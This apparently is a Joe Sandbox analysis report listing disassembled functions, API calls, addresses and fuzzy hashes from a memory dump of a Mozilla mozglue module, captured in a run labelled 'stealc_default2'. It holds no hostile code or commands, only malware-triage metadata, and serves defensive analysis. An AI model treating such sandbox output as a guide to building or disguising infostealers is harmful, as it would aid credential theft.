?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C111431

Part of subcall function 6C108AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5

free.MOZGLUE(?), ref: 6C11145A
free.MOZGLUE(?), ref: 6C11146C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 7669e6661c9d3450ded5e768fbd9d24ff2bb487215a7939ae8858594cb9269bf
Instruction ID: cad434f6382fa40bcdd3553f74c630c1be4686d2b9779bf5846c06bf61a243a8
Opcode Fuzzy Hash: 7669e6661c9d3450ded5e768fbd9d24ff2bb487215a7939ae8858594cb9269bf
Instruction Fuzzy Hash: 3A61E275A083409FDB10DF25C880BAAB7F5BFD5318F14892DE89957B11EB34E499CB42

Function 6C110F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C110F6B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C110F88
GetCurrentThreadId.KERNEL32 ref: 6C110FF7
InitializeConditionVariable.KERNEL32(?), ref: 6C111067
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C1110A7
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C11114B

Part of subcall function 6C108AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C121563), ref: 6C108BD5

free.MOZGLUE(?), ref: 6C111174
free.MOZGLUE(?), ref: 6C111186

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: 0cc0ce2f1769d986de2c2ca3cce6b5b63c10c5bafd9e1cb289bb59c15cd07a47
Instruction ID: dc4ec624cce4f97183edbe94293bc01a29784c22ad852838e829622e38eb70ce
Opcode Fuzzy Hash: 0cc0ce2f1769d986de2c2ca3cce6b5b63c10c5bafd9e1cb289bb59c15cd07a47
Instruction Fuzzy Hash: 1261DE75A083408BDB10DF24C880B9AB7F5BFD6318F14892DE89947B11EB39E959CB81

Function 6C0CE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6C0D1999), ref: 6C0CEA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C0CEA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C0CEA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6C0D1999), ref: 6C0CEA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C0D1999), ref: 6C0CEAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C0CEADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C0CEB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C0CEB27

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: e49c97b6b1af88dcafa2f3cecdcaeb19604ef255b4661995a8ced846d843eddf
Instruction ID: cb17c159c225654b3c9be5f3aa6b85204bdf6730e0f07ea5a22a1785e8f7eba9
Opcode Fuzzy Hash: e49c97b6b1af88dcafa2f3cecdcaeb19604ef255b4661995a8ced846d843eddf
Instruction Fuzzy Hash: AD4183B1A002159FDB14CF68DC81BAE77E4BF55258F250628E825E7794E730EA0487D2

Function 6C0CB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6AC

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C0CB61E), ref: 6C0CB73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C0CB61E,?,?,?,?,?,00000000), ref: 6C0CB79A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 4ecb9cc8c06ead68735d734ba3a9aca686ab60b703a26d208ee2616996ff5b28
Instruction ID: 1f883ae7321eaac905d09397d17ab8de1d291f5186090cabe16e7fb49ab69fc4
Opcode Fuzzy Hash: 4ecb9cc8c06ead68735d734ba3a9aca686ab60b703a26d208ee2616996ff5b28
Instruction Fuzzy Hash: EB41B6B2E001159FCB14DF68DC907AEB7F9BB44324F250769E825E7790D731AA1487D2

Function 6C0CEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6C145104), ref: 6C0CEFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0CEFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0CEFEC
free.MOZGLUE(?), ref: 6C0CF00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C0CF02E
memcpy.VCRUNTIME140(00000000,?), ref: 6C0CF041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0CF065
moz_xmalloc.MOZGLUE ref: 6C0CF072

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 52e293b04337f24fdddcedefbfb68a87dc9ecb7370e00e3af99ee5ec009f399d
Instruction ID: 15df3a062adf4494504566fcc3122fa505ce7da967b67a552df70127549dc932
Opcode Fuzzy Hash: 52e293b04337f24fdddcedefbfb68a87dc9ecb7370e00e3af99ee5ec009f399d
Instruction Fuzzy Hash: 59410CB1B002159FCB08CF68D8816AE73A9BF84314B34422CE815DB794EB31E915C7E2

Function 6C13B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C13B5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C13B5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C13B5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C13B5F4
__Init_thread_footer.LIBCMT ref: 6C13B605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C13B61F
std::_Facet_Register.LIBCPMT ref: 6C13B631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C13B655

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 33978cc8f177d640adad2b935181d1fffbf0cee7466ae4c1c1fbe492d700c554
Instruction ID: ed6d73f84b519e45c565c9b3d9814bad122e8f3cb79622634feb92af13ce31f7
Opcode Fuzzy Hash: 33978cc8f177d640adad2b935181d1fffbf0cee7466ae4c1c1fbe492d700c554
Instruction Fuzzy Hash: 3731F471B00614CBCF00EFA8C8589AEB7B5FF8A32CF144569D92697740EB30A806DF91

Function 6C0D9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C127ABE), ref: 6C0D98A8
moz_xmalloc.MOZGLUE(00000020), ref: 6C0D9909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6C0D9918
free.MOZGLUE(?), ref: 6C0D9975

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: a83aca66702f11091e622372851c2b4fb5a59d9cfdaa2b45353db1e64bc8aff6
Instruction ID: 044bc05583cf156e34d2a8719c17ea5815d3faaae4e1fabf649bf3f083c8c020
Opcode Fuzzy Hash: a83aca66702f11091e622372851c2b4fb5a59d9cfdaa2b45353db1e64bc8aff6
Instruction Fuzzy Hash: 0B718A756047058FC725CF2CC490A5AF7F1FF4A328B664AADD85A8BB90DB31B841CB90

Function 6C0DB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON

Download Yara Rule

APIs

?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB7E6
?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB80C
?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE), ref: 6C0DB88E
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C11CC83,?,?,?,?,?,?,?,?,?,6C11BCAE,?,?,6C10DC2C), ref: 6C0DB896

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ?good@ios_base@std@@D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@Osfx@?$basic_ostream@
String ID:
API String ID: 922945588-0
Opcode ID: b969f5dccd4677c9612c42c5fcc28c520e9e656356045f5e82ed1c65b8044546
Instruction ID: d3492c36faf0f57f48298a5fc0a02a8191dfaa8344c05590bcb7da2b7215dedb
Opcode Fuzzy Hash: b969f5dccd4677c9612c42c5fcc28c520e9e656356045f5e82ed1c65b8044546
Instruction Fuzzy Hash: 145168357006008FCB25DF59C494A6ABBF5FF89318B6A859DE99A87351C731F802CB80

Function 6C104AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B48
free.MOZGLUE(?,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104BBC
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,pid:,00000004,?,?,?,6C104AB7,?,6C0C43CF,?,6C0C42D2), ref: 6C104BEE

Strings

pid:, xrefs: 6C104BE8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfreestrncmp
String ID: pid:
API String ID: 1916652239-3403741246
Opcode ID: 3684549bda0e5f9dcfd95aac27dd2671574e15d76bb257823378585191133315
Instruction ID: 606d373748da29ba43b9dc0729f96c014195e3a1ab3be393957ab6c131ef093f
Opcode Fuzzy Hash: 3684549bda0e5f9dcfd95aac27dd2671574e15d76bb257823378585191133315
Instruction Fuzzy Hash: 064109717042159BCB14CFB8DCC069FBBF9AF95228B144638E969D7781DB30E908C7A1

Function 6C111D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C111D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C111BE3,?,?,6C111D96,00000000), ref: 6C111D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C111BE3,?,?,6C111D96,00000000), ref: 6C111D4C
GetCurrentThreadId.KERNEL32 ref: 6C111DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C111DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C111DDA

Part of subcall function 6C111EF0: GetCurrentThreadId.KERNEL32 ref: 6C111F03
Part of subcall function 6C111EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C111DF2,00000000,00000000), ref: 6C111F0C
Part of subcall function 6C111EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C111F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C111DF4

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: bc930628359d71a51f139f2a36c2c56a924a45db60cef029f2d527acfb517556
Instruction ID: 61c09496964f29c9b498bf0771f635a6f1533e957019fe5288a971e2b538ba46
Opcode Fuzzy Hash: bc930628359d71a51f139f2a36c2c56a924a45db60cef029f2d527acfb517556
Instruction Fuzzy Hash: CF4188B52007009FCB10DF28C488B5ABBF9FB99318F10842DE95A87B41DB35F854CB91

Function 6C10D210 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6C0D5820,?), ref: 6C10D21F
moz_xmalloc.MOZGLUE(00000001,?,?,6C0D5820,?), ref: 6C10D22E

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6C0D5820,?), ref: 6C10D242
free.MOZGLUE(00000000,?,?,?,?,?,?,6C0D5820,?), ref: 6C10D253

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6C0D5820,?), ref: 6C10D280

Strings

Xl, xrefs: 6C10D23C, 6C10D29E, 6C10D2E3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
String ID: Xl
API String ID: 2029485308-309550100
Opcode ID: 8e8122c47098c2e3db4100d4388e7f442ec6fd5287ec6048602b01b67edc8ac9
Instruction ID: 3b3e19aca3bcebd77bf00f34d18f80fa6a5edb9c255e2ec553dcd61af44abedd
Opcode Fuzzy Hash: 8e8122c47098c2e3db4100d4388e7f442ec6fd5287ec6048602b01b67edc8ac9
Instruction Fuzzy Hash: 993107B5B012158FCB00EF58C880AAEBBB5FF99308F254169D914AB701D772F806CBE1

Function 6C12AAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C14E220,?), ref: 6C12BC2D
ReleaseSRWLockExclusive.KERNEL32(6C14E220), ref: 6C12BC42
RtlFreeHeap.NTDLL(?,00000000,6C13E300), ref: 6C12BC82
RtlFreeUnicodeString.NTDLL(6C14E210), ref: 6C12BC91
RtlFreeUnicodeString.NTDLL(6C14E208), ref: 6C12BCA3
RtlFreeHeap.NTDLL(?,00000000,6C14E21C), ref: 6C12BCD2
free.MOZGLUE(?), ref: 6C12BCD8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: c0a0ef0c1b39b2978bfafe293344a86bebce95c098db37997fb739b3b1be4ba7
Instruction ID: 29c1fe2160a838a8b22b1bfd7654ed168e43101bf1ab46e2333639df8bbfc8b8
Opcode Fuzzy Hash: c0a0ef0c1b39b2978bfafe293344a86bebce95c098db37997fb739b3b1be4ba7
Instruction Fuzzy Hash: 4C21BF7A600714CFE7209F0AC880B66B7E9BF41718F158469E81A5BA10CB79F895CBD0

Function 6C0D38A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C14E220,?,?,?,?,6C0D3899,?), ref: 6C0D38B2
ReleaseSRWLockExclusive.KERNEL32(6C14E220,?,?,?,6C0D3899,?), ref: 6C0D38C3
free.MOZGLUE(00000000,?,?,?,6C0D3899,?), ref: 6C0D38F1
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D3920
RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C0D3899,?), ref: 6C0D392F
RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C0D3899,?), ref: 6C0D3943
RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C0D396E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
String ID:
API String ID: 3047341122-0
Opcode ID: 07a580446a2eef3d74ff054405a3c79108f53ba1a1948677a6d89aa1f6463e1e
Instruction ID: bff69856fcf641b5696a4c8749b5c3e9433615a4b35139ac0f546dd18f2998ab
Opcode Fuzzy Hash: 07a580446a2eef3d74ff054405a3c79108f53ba1a1948677a6d89aa1f6463e1e
Instruction Fuzzy Hash: 1821D376600720DFE710DF15C880B9AB7F5EF49328F168429D95A97B10C731F885CB90

Function 6C1084E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1084F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1085AC

Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C10767F
Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C107693
Part of subcall function 6C107670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C1085B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1076A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C1085B2

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
